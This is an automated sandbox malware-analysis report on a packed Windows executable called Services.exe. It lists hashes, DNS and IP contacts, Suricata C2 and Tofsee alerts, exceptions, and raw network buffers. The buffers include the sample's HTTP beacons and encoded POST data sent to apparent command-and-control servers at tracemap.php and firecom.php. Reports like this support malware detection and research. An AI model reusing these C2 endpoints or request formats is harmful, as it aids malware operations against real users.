popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Services.exe

UPX VMProtect PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 7, 2023, 7:40 a.m. Nov. 7, 2023, 7:44 a.m.
Size 4.8MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d9ce98a0b0029d26876ac86409bac27e
SHA256 c6185a23c51b8ac77e6c1bdf2cd4a8d39b02af8b8027d4162cf9766d19cf87c8
CRC32 FE1CD402
ssdeep 98304:T/kRk50qK5N7jdM2gOpqufwX9h+3dcWUWZJziS1hZUZyeYOth3fOCQb9GK1/49s:bokO9jdMxOUUwWdiWmS+JuZGKJ49
Yara
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • VMProtect_Zero - VMProtect packed file

Name Response Post-Analysis Lookup
telegram.org
A 149.154.167.99
149.154.167.99
api.db-ip.com
A 104.26.5.15
A 104.26.4.15
A 172.67.75.166
104.26.4.15
apps.identrust.com
A 121.254.136.9
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 121.254.136.18
23.43.165.105
twitter.com
A 104.244.42.1
104.244.42.1
dzen.ru
A 62.217.160.2
62.217.160.2
ipinfo.io
A 34.117.59.81
34.117.59.81
yandex.ru
A 5.255.255.77
A 77.88.55.88
A 77.88.55.60
A 5.255.255.70
5.255.255.70
sso.passport.yandex.ru
A 213.180.204.24
CNAME passport.yandex.ru
213.180.204.24
db-ip.com
A 104.26.5.15
A 104.26.4.15
A 172.67.75.166
172.67.75.166
ironhost.io
A 104.21.57.237
A 172.67.193.129
104.21.57.237
www.maxmind.com
A 104.18.145.235
A 104.18.146.235
104.18.146.235
IP Address Status Action
125.253.92.50 Active Moloch
104.18.146.235 Active Moloch
104.244.42.1 Active Moloch
104.26.5.15 Active Moloch
121.254.136.18 Active Moloch
149.154.167.99 Active Moloch
164.124.101.2 Active Moloch
172.67.193.129 Active Moloch
172.67.75.166 Active Moloch
213.180.204.24 Active Moloch
34.117.59.81 Active Moloch
5.255.255.70 Active Moloch
62.217.160.2 Active Moloch
91.92.243.151 Active Moloch
94.142.138.131 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49162 -> 149.154.167.99:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49168 -> 62.217.160.2:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49165 -> 104.244.42.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 5.255.255.70:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49169 -> 213.180.204.24:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49174 -> 94.142.138.131:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 91.92.243.151:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 104.26.5.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 172.67.193.129:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49175 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49175 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49175 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 149.154.167.99:443 -> 192.168.56.101:49164 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 172.67.75.166:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49175 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49167
5.255.255.70:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=*.xn--d1acpjx3f.xn--p1ai e4:ba:b2:7f:bf:93:b8:22:10:26:70:37:9c:03:1a:9d:fb:23:17:24
TLSv1
192.168.56.101:49169
213.180.204.24:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=sso.passport.yandex.ru 3a:82:43:a9:43:9c:c8:90:01:04:4f:74:1b:6c:cd:4b:9b:19:7d:93
TLSv1
192.168.56.101:49177
104.26.5.15:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1
192.168.56.101:49168
62.217.160.2:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 C=RU, ST=Moscow, L=Moscow, O=VK LLC, CN=*.dzen.ru 6a:31:14:29:60:07:c9:c6:17:7b:d1:27:ad:53:57:ec:d8:c1:d8:d2
TLSv1
192.168.56.101:49172
172.67.193.129:443 		C=US, O=Let's Encrypt, CN=E1 CN=ironhost.io bf:96:55:fe:92:31:2c:3b:86:d9:a5:21:ac:2a:4c:b7:56:b7:9e:19
TLSv1
192.168.56.101:49178
172.67.75.166:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .vmp0
section .vmp1
section .vmp2
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e
WinHttpCloseHandle-0x30d winhttp+0x28f4 @ 0x741c28f4
WinHttpCloseHandle+0x53 WinHttpSetOption-0x1318 winhttp+0x2c54 @ 0x741c2c54
services+0x2ebe5 @ 0x20ebe5
services+0x578e @ 0x1e578e
services+0x5739 @ 0x1e5739
services+0x699a @ 0x1e699a
services+0xe696 @ 0x1ee696
services+0x38310 @ 0x218310
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x741c2753
registers.esp: 12703936
registers.edi: 132
registers.eax: 12703964
registers.ebp: 12703980
registers.edx: 12705140
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0

__exception__

 stacktrace: 
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e
WinHttpCloseHandle+0x79 WinHttpSetOption-0x12f2 winhttp+0x2c7a @ 0x741c2c7a
services+0x2ebe5 @ 0x20ebe5
services+0x578e @ 0x1e578e
services+0x5739 @ 0x1e5739
services+0x699a @ 0x1e699a
services+0xe696 @ 0x1ee696
services+0x38310 @ 0x218310
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x741c2753
registers.esp: 12705040
registers.edi: 132
registers.eax: 12705068
registers.ebp: 12705084
registers.edx: 0
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0

__exception__

 stacktrace: 
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e
WinHttpCloseHandle-0x30d winhttp+0x28f4 @ 0x741c28f4
WinHttpCloseHandle+0x53 WinHttpSetOption-0x1318 winhttp+0x2c54 @ 0x741c2c54
services+0x2ebe5 @ 0x20ebe5
services+0x578e @ 0x1e578e
services+0x5739 @ 0x1e5739
services+0x699a @ 0x1e699a
services+0xe696 @ 0x1ee696
services+0x38310 @ 0x218310
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x741c2753
registers.esp: 12703936
registers.edi: 132
registers.eax: 12703964
registers.ebp: 12703980
registers.edx: 12705140
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0

__exception__

 stacktrace: 
WinHttpCloseHandle-0x3e3 winhttp+0x281e @ 0x741c281e
WinHttpCloseHandle+0x79 WinHttpSetOption-0x12f2 winhttp+0x2c7a @ 0x741c2c7a
services+0x2ebe5 @ 0x20ebe5
services+0x578e @ 0x1e578e
services+0x5739 @ 0x1e5739
services+0x699a @ 0x1e699a
services+0xe696 @ 0x1ee696
services+0x38310 @ 0x218310
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 81 79 24 41 41 41 41 0f 85 b4 0d 00 00 83 65 e4
exception.instruction: cmp dword ptr [ecx + 0x24], 0x41414141
exception.exception_code: 0xc0000005
exception.symbol: WinHttpCloseHandle-0x4ae winhttp+0x2753
exception.address: 0x741c2753
registers.esp: 12705040
registers.edi: 132
registers.eax: 12705068
registers.ebp: 12705084
registers.edx: 0
registers.ebx: 132
registers.esi: 0
registers.ecx: 132
1 0 0

__exception__

 stacktrace: 
services+0x103bd @ 0x1f03bd
services+0x38310 @ 0x218310
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: f7 f1 8b d8 8b 44 24 0c f7 f1 8b d3 eb 41 8b c8
exception.symbol: services+0x4eef4
exception.instruction: div ecx
exception.module: Services.exe
exception.exception_code: 0xc0000094
exception.offset: 323316
exception.address: 0x22eef4
registers.esp: 12705220
registers.edi: 0
registers.eax: 0
registers.ebp: 12706224
registers.edx: 0
registers.ebx: 12706244
registers.esi: 169236000
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://91.92.243.151/api/tracemap.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://94.142.138.131/api/tracemap.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://94.142.138.131/api/firecom.php
request GET http://91.92.243.151/api/tracemap.php
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://94.142.138.131/api/tracemap.php
request POST http://94.142.138.131/api/firecom.php
request GET http://www.maxmind.com/geoip/v2.1/city/me
request GET https://yandex.ru/
request GET https://dzen.ru/?yredirect=true
request GET https://sso.passport.yandex.ru/push?uuid=17ee63be-a01d-4351-b836-3f7809d3449d&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue
request GET https://db-ip.com/
request POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
request POST http://94.142.138.131/api/firecom.php
request POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a20000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
domain ipinfo.io
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x004af400', u'virtual_address': u'0x002e2000', u'entropy': 7.993526835082115, u'name': u'.vmp2', u'virtual_size': u'0x004af280'} entropy 7.99352683508 description A section with a high entropy has been found
section {u'size_of_data': u'0x00018400', u'virtual_address': u'0x00794000', u'entropy': 7.392826746214749, u'name': u'.rsrc', u'virtual_size': u'0x000267e6'} entropy 7.39282674621 description A section with a high entropy has been found
entropy 0.998266190719 description Overall entropy of this PE file is high
section .vmp0 description Section name indicates VMProtect
section .vmp1 description Section name indicates VMProtect
section .vmp2 description Section name indicates VMProtect
host 125.253.92.50
host 91.92.243.151
host 94.142.138.131
Time & API Arguments Status Return Repeated

WSASend

 buffer: okeIkW¬®éÂúç*8Ÿß‘l]}&ÉuɌ3ÙÎÕ¤ã/5 ÀÀÀ À 28*ÿ telegram.org  
socket: 404
0 0

WSASend

 buffer: 51eIkX÷‰tMÅãhCeK¬æz&g ~î7ƒÃXÚ  ÿ
socket: 404
0 0

WSASend

 buffer: njeIkX€0<Zž(tðÉ ™Ô/oBK–&Â`´áŽŽN¹/5 ÀÀÀ À 28)ÿ twitter.com  
socket: 516
0 0

WSASend

 buffer: 51eIkXe5ðÜA¿‘,`Àg©] Ææ"ÇîÊÈøB‚  ÿ
socket: 516
0 0

WSASend

 buffer: lheIkX§ãPA¤}:iÙý9wüD3«êFG±9[«:yg[/5 ÀÀÀ À 28'ÿ yandex.ru  
socket: 520
0 0

WSASend

 buffer: FBAåF¨ö’Ë)æ„9÷õFD¬ }cÙK :”æt4Br˜\e01c`¨¦æ9’%*‰v—Õ#Àed+Et-3Ýxgâ0Ë´iöÞ?G"Î.Wʋ>®uEå@ç¾5樚¸a§ÝŽs 2èŠ R3Ò\TzPF
socket: 520
0 0

WSASend

 buffer: ૯TÐe©Å2ã"#¢qNðXî¨w'ææ]ùbÙÍt’¸p Æ˜ßàPBÙû(³ñäÎfhÃRäB¨¼‹ çÄ÷ÛÂsқ̑k$èüՎlPø(ä·«S]p°<E•=ÜiVÄ@E·^Á£Ztœ‘XWh@àGÛuùðè:û6yµébCµNOç· àf—º4Ó#–IüsV„ð2NJS¿Àhõ?1ëöÌÛÎ&§”—'ºnï'„ʧ­U'êÈ ~‡f;$èÚºé'‹ £òÂX„I b½ÊÄß‚
socket: 520
0 0

WSASend

 buffer: jfeIkZ¹_Zk7c?ÁP*¬â:MŸû͉‰Ï'Séð/5 ÀÀÀ À 28%ÿ dzen.ru  
socket: 940
0 0

WSASend

 buffer: FBA6(£àH&ëÀþ´wó?:˜¨žÖãÆì7¬izãøkŠ"UX,1±j'Žó×ÅÎø똃ÞÉϸ—ÞW#eAŒ“¨û-Š0äeýˆMF†…VóêÖùù^mÜùÁê"e}åï#|¤Z éƐç˜t!¯®lhöx
socket: 940
0 0

WSASend

 buffer: àsôO¼…úÄ桽ZœFè¡Ûñ(7¢vš³•VSËõ2¸vXŠ$~>G·´6ܙxC¯ÿ óöš;Ôþ!ë4`¾=éƒ`‰! œ[ËB˜¡9-ÜHzkv…¯D½˜ÙV—t<¤9%¿Ðúf–¦YùöØ94ؔ -݄0F[ÆÛïvÔš7‘ˆ/<ö¥jŠ—YôäŠdèý0?¿P!ôt{; ü9ºdèšIdß÷B˜­PaNÊÚ$ñýŠ2­MÝØ2(ƹþÛ£äù)9wK[
socket: 940
0 0

WSASend

 buffer: yueIk[yî¥%’,]ãÓV äæÑӸߍ½Ñ‡¡Å¨/5 ÀÀÀ À 284ÿsso.passport.yandex.ru  
socket: 944
0 0

WSASend

 buffer: FBAA×DI÷ÏÃj9|nN¸sÿ£öuå/ÈG"²Ï ”åÄ«1ÓHø«ÎvEJ¶ËP¥'[·Ž3$×çH}… 0»ßIA<t]‹¶J"Ä*ÆÇYåÆl¼F4ÉÈ4ܬ1­¯·r/̾—}<-+îˆòßÈ
socket: 944
0 0

WSASend

 buffer: `†<ãJ÷&ÿlø¤1[ ôzOm”ˆ®zꗶ"0Iä‚äSž. èÊ:[iÞoÞ_oøfÚI0vuƒ”c@²ü–‰xó^ˆÄIåo³Î¤%IÊß36­Ç~S„Žà×%‰®ë©þÒml.ŽÑ™WA,¡ä>C[=FyÁ‰sŠòX~ÉZsñ–~šˆqÞ[Ǿ¶ëÂf•¤->Ec8ŸRf‰5Ž•¾wµ¹‰¿ÕXæwígñ{’kÄ<º ­iUÔÜ_@ je'Š©£Í‰º7ëTRJ%¬SïBoû|§¤€±3aF9³#°MÀËNOçj—!΄§ÿ´Ôƒ‹•öŸ±ì-97Àž-ŒJOîZZõò­iFwן’T ªY£F ë ̳ëPíÞ%ª…ÃW£Äs}¨&ŸÃ71—ññ?E}TÓN(Xƒ2TØqƟ\ñ¯F˜—ÑÀ™ÆoïÐ2ùä.·HĄŸgÌj Çå ·‘vcõ¸Y‰ c•Yÿœ7"}+ÙÌ1Dzd.Iüâ*b_ Š%ޅ”g:_£™Þ¨ê„Mö%³Â§k;ÛµKYÁMFJÖ62–ù­A±V <›åRþ#qԌ'¼¤."$÷H0V5"EhRíŽÛû¹#S?N„zf ŒmE°#\“<Ðkl¦Ð‡¾oªÃÀþ*‹¬ ]›f&°¶¯¤ C-0Ö0Ó«9¢ƒ™ÜC6a†ý"«Ð  `mLï]jsþ—3¤[&Óü÷’9WnmýøÂ'JµG=µrTçK
socket: 944
0 0

WSASend

 buffer:  0PïëDøZO¶¸Qµ Œ“ ¾»ß@îê=ž U^²-
socket: 944
0 0

WSASend

 buffer:  N÷b7<¹MÍNdJÄÈöy±cž-±å‡ˆaޛÍIÉ
socket: 944
0 0

WSASend

 buffer: GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 91.92.243.151
socket: 956
0 0

WSASend

 buffer: njeIk`;€£¥ü¥I§|~zXµ¼˜C?cE:¸ö/5 ÀÀÀ À 28)ÿ ironhost.io  
socket: 960
0 0

WSASend

 buffer: FBAžKŸ¢ä4ÐødE½öÎÿF²˜šŸÏëlÞR¡‘½½¿XŸEÁQ çþ”\,µg.7v0Pûö,µ¼°ßÆ+?0AJZONwlÚ#²f({g3‹Óò£Ê‡lò¡Éªë’Œó®¥¨t±Áa—O1u©&i
socket: 960
0 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1016
0 0

WSASend

 buffer: GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 94.142.138.131
socket: 960
0 0

WSASend

 buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 94.142.138.131
socket: 960
0 0

WSASend

 buffer: data=m7moirmur7WzsqDt8ug=
socket: 960
0 0

WSASend

 buffer: lheIkaÞpÞÛWid°Ó^dä I*…éߓ©MÆ6_/5 ÀÀÀ À 28'ÿ ipinfo.io  
socket: 1060
0 0

WSASend

 buffer: 51eIkaÑåæǎ…[*3jôÚ4²ðž" ‡Þ‘±Úú1  ÿ
socket: 1060
0 0

WSASend

 buffer: lheIkaÄSÕ³€%åßÜÚ@£¯Ò£XúoúG$¬’¿HÔ?/5 ÀÀÀ À 28'ÿ db-ip.com  
socket: 1064
0 0

WSASend

 buffer: FBAâ¹JƒÏ¯ #­£k›#¹qâýh8v„sÆ\i‡Ä5´_M?š£¸Î€f-sÅ°Óó¾i,­ D¨²xÖÓ0ŽêQ…(wúl<9\sBÁ r¡4»a[Á–•øÅ·ÀΌ׃V;æçz<’]Ï
socket: 1064
0 0

WSASend

 buffer: à% Þ<Jñé8ŠbŠæ0* tp“.r™7{IÃ9:¨¦–¨àç"Xïíݶ˜2õ”[.®–f ª×íâo±3û@LZ£œ)Üٞ¢¬82gž¹ÍfîŒù+Ø`Å W;.£¼’rR#Uœý/–Î?F}ÎH€Ûû ~îq_1 Uê!#bÄW7>¬ôz¿º“µvsÁŒ…­¤K Ê-ôƒá¼é 3FŽ&ÝöXòï{”EÆ)ƒÓnblËÓYwËNü;p¥²P¬¡Àá0þóÈ3.Ž± X³}‹®î
socket: 1064
0 0

WSASend

 buffer: pleIkaøônx1UQÇMOÞ ØÀ¾ÚŸ¯~iJÅóÑ£p/5 ÀÀÀ À 28+ÿ api.db-ip.com  
socket: 1072
0 0

WSASend

 buffer: FBA/„™¼{›¨`‹r'@Ç%PylÜî²d؏ƒ'9=ùú ‹ù Ãz½4Aªڐ‡wœc|ÝuÀ{¦D´ +ZÉ0ܱ]N5k3§dfN«d/Ú&9›\,*‰H5ªd‰:^Ú-l—„é°dÎá2Z
socket: 1072
0 0

WSASend

 buffer: @ÛB䁳~'1—T›q¶+dÆ÷ЎìmÄGô‘+0í¸¿Ý‹ ò¸gÑô œ8rP\ C –àÙ㫺“¶Ì\Ä=2ú{f¸jC)u¶}}&­©Lõ›EÃ~>£=o*xý›H W,—g¥*%¦”g€,yüêÐ\”Ét ½Y°Þ­?ÚÚº)=¸!ͤ¾~…< šOMȃ\µ`KE±ÛYÞ´¾VÚctþCèÌí^_ªµ¥ý‰ÍX«[ˆ+)59×í¸áÍ}•v|ÃãqeG%Pâãƒ~ú0oSõ4rXïÓñÏ_ñ¦>XÒ#ä ß¾fº yƒãt*Ò䇫G Ã~P‘}¬xRš²~Çs?Z?¢³=#>“ðÅänAÝækŠY#OKÃqä6N‚ÍhJã×ü
socket: 1072
0 0

WSASend

 buffer: GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com
socket: 1080
0 0

WSASend

 buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 94.142.138.131
socket: 960
0 0

WSASend

 buffer: data=m7molYw=
socket: 960
0 0

WSASend

 buffer: POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 94.142.138.131
socket: 960
0 0

WSASend

 buffer: data=m7mokLO9uLmukLWyt6C4uem57-W_5L7lvurkvr_uv-657-3ovum97b_s6OrluKA=
socket: 960
0 0